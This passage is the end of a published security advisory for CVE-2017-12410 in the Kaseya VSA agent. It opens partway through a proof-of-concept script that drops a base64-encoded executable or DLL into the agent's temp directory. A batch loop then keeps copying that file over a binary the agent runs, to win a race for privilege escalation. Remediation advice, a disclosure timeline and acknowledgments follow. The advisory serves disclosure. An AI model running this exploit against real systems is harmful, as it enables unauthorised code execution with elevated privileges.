(\$path_opt.compareTo("work") -eq 0) { if (\$exec_opt.compareTo("default") -eq 0) { \$exec_opt = "NetUserStateAudit.exe" } \$uid = Get-ChildItem "hklm:\SOFTWARE\Kaseya\Agent" -Name \$path = Get-ItemPropertyValue "hklm:\SOFTWARE\Kaseya\Agent\\$uid" ` -Name TempPath [io.file]::WriteAllBytes( "\$path\kaseya.exe", [System.Convert]::FromBase64String(\$exe) ) "powershell.exe %s" > "\$path\kaseya.ps1" Remove-Item "\$path\kaseya.bat" Add-Content "\$path\kaseya.bat" "cd \$path" Add-Content "\$path\kaseya.bat" ":l" Add-Content "\$path\kaseya.bat" "copy kaseya.exe \$exec_opt" Add-Content "\$path\kaseya.bat" "goto l" } else { if (\$exec_opt.compareTo("default") -eq 0) { \$exec_opt = "kawmi.dll" } \$path = "C:\\temp" [io.file]::WriteAllBytes( "\$path\kaseya.dll", [System.Convert]::FromBase64String(\$dll) ) Remove-Item "\$path\kaseya.bat" Add-Content "\$path\kaseya.bat" "cd \$path" Add-Content "\$path\kaseya.bat" ":l" Add-Content "\$path\kaseya.bat" "copy kaseya.dll \$exec_opt" Add-Content "\$path\kaseya.bat" "goto l" } # TODO: add check if we already won a race and kill the loop Start-Process "\$path\kaseya.bat" #while(1) { # try { # # FIXME: test Copy-Item to make it opsec safe # #Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe" ` # #-ErrorAction SilentlyContinue # Copy-Item "\$path\kaseya.exe" "\$path\NetUserStateAudit.exe" # } catch [System.Exception] { # continue # } #} ''' % (path, execName, encLauncher) return script EOF -- Remediation: - Restrict permissions for users who can modify directories and files used by the Kaseya VSA. - Contact vendor for details. Timeline: 03.08.2017: Initial contact email sent to security@kaseya.com with information about the vulnerability. 03.08.2017: Notification sent to vendor that CVE-2017-12410 has been assigned for this vulnerability by MITRE. 05.08.2017: Vendor confirms receiving the information about the vulnerability and informs that the development team is looking into the issue. 19.11.2017: No vendor response. Request for a status update. 10.02.2018: No vendor response. Notifying vendor about the planned advisory release. 11.02.2018: Vendor replies with information that the fix is ready, they are in the process of backporting it across a three versions of their code, testing it, releasing patches and rolling it out across their sass (sic!) versions. Vendor requests to postpone publication of the advisory for 30 days to ensure that patches are tested and ready for release. 12.02.2018: Confirmation sent that the publication of the advisory will be postponed. 12.02.2018: Vendor acknowledges and commits to provide a weekly updates as they progress to release. 20.03.2018: No vendor response. Advisory published. 23.03.2018: The advisory is released. References: [1] https://www.kaseya.com/products/vsa Acknowledgments: - Mike Puglia (Kaseya) - Niket Khosla (Telstra) - Telstra BTS Security Services (redteamnsw@team.telstra.com) Thanks, Filip Palian